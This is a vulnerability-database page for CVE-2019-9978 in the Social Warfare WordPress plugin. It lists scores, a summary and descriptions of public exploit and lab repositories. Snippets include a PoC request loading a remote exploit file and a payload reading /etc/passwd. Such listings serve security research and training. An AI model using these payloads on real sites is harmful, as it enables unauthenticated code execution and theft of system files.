4.3
CVSSv2

CVE-2019-9978

Published: 24/03/2019 Updated: 30/07/2021
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 6.1 | Impact Score: 2.7 | Exploitability Score: 2.8
VMScore: 440
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

The social-warfare plugin prior to 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

warfareplugins social warfare

warfareplugins social warfare pro

Exploits

# Title: RCE in Social Warfare Plugin Wordpress ( <=3D352 ) # Date: March, 2019 # Researcher: Luka Sikic # Exploit Author: hash3liZer # Download Link: wordpressorg/plugins/social-warfare/ # Reference: wpvulndbcom/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM # Github: git ...
WordPress Social Warfare plugin versions prior to 353 suffer from a remote code execution vulnerability ...

Github Repositories

Vulnerable Wordpress Environment for educational purposes

Vulnerable Wordpress (VWP) This repo is a modified version of the DVWP made by vavkamil - githubcom/vavkamil/dvwp VWP is an intentionally created vulnerable wordpress environment made for vulnerability research, penetration testing practices, and source code review 한글 문서를 보시려면 READMEkomd 를 참고해주세요 Credits As mentioned above, this re

CVE-2019-9978 This repository contains a Python script designed to exploit a Remote Code Execution (RCE) vulnerability in WordPress Plugin Social Warfare < 353 The vulnerability allows an attacker to execute arbitrary code on the target system by sending a crafted payload wwwexploit-dbcom/exploits/46794 Usage Create Payload: First, a payload is created usin

CVE-2019-9978 - RCE on a Wordpress plugin: Social Warfare < 3.5.3

CVE-2019-9978 - Social Warfare Wordpress plugin RCE &lt; 353 RCE on a Social Warfare Wordpress plugin without any prior authentication Proof Of Concept curl 127001/wp-admin/admin-postphp?rce=id&amp;swp_debug=load_options&amp;swp_url=1721801:1337/exploitphp Vulnerable code: Fix: githubcom/

python3 version of the CVE-2019-9978 exploit

CVE-2019-9978-Python3 python3 version of the CVE-2019-9978 exploit To Do http server

cve-2019-9978

CVE-2019-9978 This is part of Cved: a tool to manage vulnerable docker containers Cved: githubcom/git-rep-src/cved Image source: githubcom/cved-sources/cve-2019-9978 Image author: githubcom/cved-sources/cve-2019-9978

Vulnerable WordPress Application Playground for WordPress hacking and wpscan testing DO NOT EXPOSE THIS TO INTERNET! Installation $ git clone githubcom/vavkamil/dvwpgit $ cd dvwp/ $ docker-compose up -d --build $ docker-compose run --rm wp-cli install-wp Usage $ docker-compose up $ docker-compose down

CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)

CVE-2019-9978 CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (&lt;=352) Description Unauthenticated remote code execution has been discovered in functionality that handles settings import A user can leverage the use of RFI to RCE PoC Copy the following payload: &lt;pre&gt;system('cat /etc/passwd')&lt;/pre&gt;

Social WarFare Plugin (<=3.5.2) Remote Code Execution

CVE-2019-9978 Exploit Social WarFare Plugin (&lt;=352) Remote Code Execution

Remote Code Execution in Social Warfare Plugin before 3.5.3 for Wordpress.

CVE-2019-9978 - Social Warfare Wordpress plugin RCE &lt; 353 Remote Code Execution in Social Warfare Plugin before 353 for Wordpress This Poc does not require running an additional HTTP Server Just pass your local IP and the desired port and the exploit will create a server in its own thread Usage usage: CVE-2019-9978py [-h] -t TARGET -l LHOST -p LPORT -c COMMAND o

Damn Vulnerable WordPress

Damn Vulnerable WordPress Playground for WordPress hacking and wpscan testing DO NOT EXPOSE THIS TO INTERNET! Installation $ git clone githubcom/vavkamil/dvwpgit $ cd dvwp/ $ docker-compose up -d --build $ docker-compose run --rm wp-cli install-wp Usage $ docker-compose up -d $ docker-compose down

Vulnerable WordPress Application Playground for WordPress hacking and wpscan testing DO NOT EXPOSE THIS TO INTERNET! Installation $ git clone githubcom/vavkamil/dvwpgit $ cd dvwp/ $ docker-compose up -d --build $ docker-compose run --rm wp-cli install-wp Usage $ docker-compose up $ docker-compose down

cve-2019-9978 PoC

cve-2019-9978 This is a script that allows exploiting the CVE-2019-9978 vulnerability in a straightforward manner, intended for use in Capture The Flag (CTF) challenges or as a proof of concept for penetration testing Prerequisites Python 3 Requests library (Install with pip install requests) Usage Clone or download this repository Open a terminal and navigate to the scrip

TCC Container engine (comunicação): Identificar uma maneira de coletar informações de uma aplicação que esteja rodando dentro do ambiente de container Seguindo a segunda e terceira proposta do artigo ISCC2021 (a ideia é ficar dentro do ambiente do container) Plugin que permite coletar informações/interaç&ot

Damn Vulnerable WordPress Playground for WordPress hacking and wpscan testing DO NOT EXPOSE THIS TO INTERNET! Installation $ git clone githubcom/vavkamil/dvwpgit $ cd dvwp/ $ docker compose up -d --build $ docker compose run --rm wp-cli install-wp Usage $ docker-compose up -d $ docker-compose down Shell docker exec -ti dvwp-wordpress-1 /bin/bash Interface Loopback IP

Damn Vulnerable WordPress Playground for WordPress hacking and wpscan testing DO NOT EXPOSE THIS TO INTERNET! Installation $ git clone githubcom/vavkamil/dvwpgit $ cd dvwp/ $ docker-compose up -d --build $ docker-compose run --rm wp-cli install-wp Usage $ docker-compose up -d $ docker-compose down

Damn Vulnerable WordPress Playground for WordPress hacking and wpscan testing DO NOT EXPOSE THIS TO INTERNET! Installation $ git clone githubcom/vavkamil/dvwpgit $ cd dvwp/ $ docker-compose up -d --build $ docker-compose run --rm wp-cli install-wp Usage $ docker-compose up -d $ docker-compose down

j.info Cybersecurity Blog

Escape on Hack the Box February 21st 2024 Topics: Another medium difficulty Windows box on the TJ Null list Escape Walkthrough Jeeves on Hack the Box February 18th 2024 Topics: Another medium difficulty Windows box on the TJ Null list Jeeves Walkthrough Intelligence on Hack the Box February 13th 2024 Topics: A medium difficult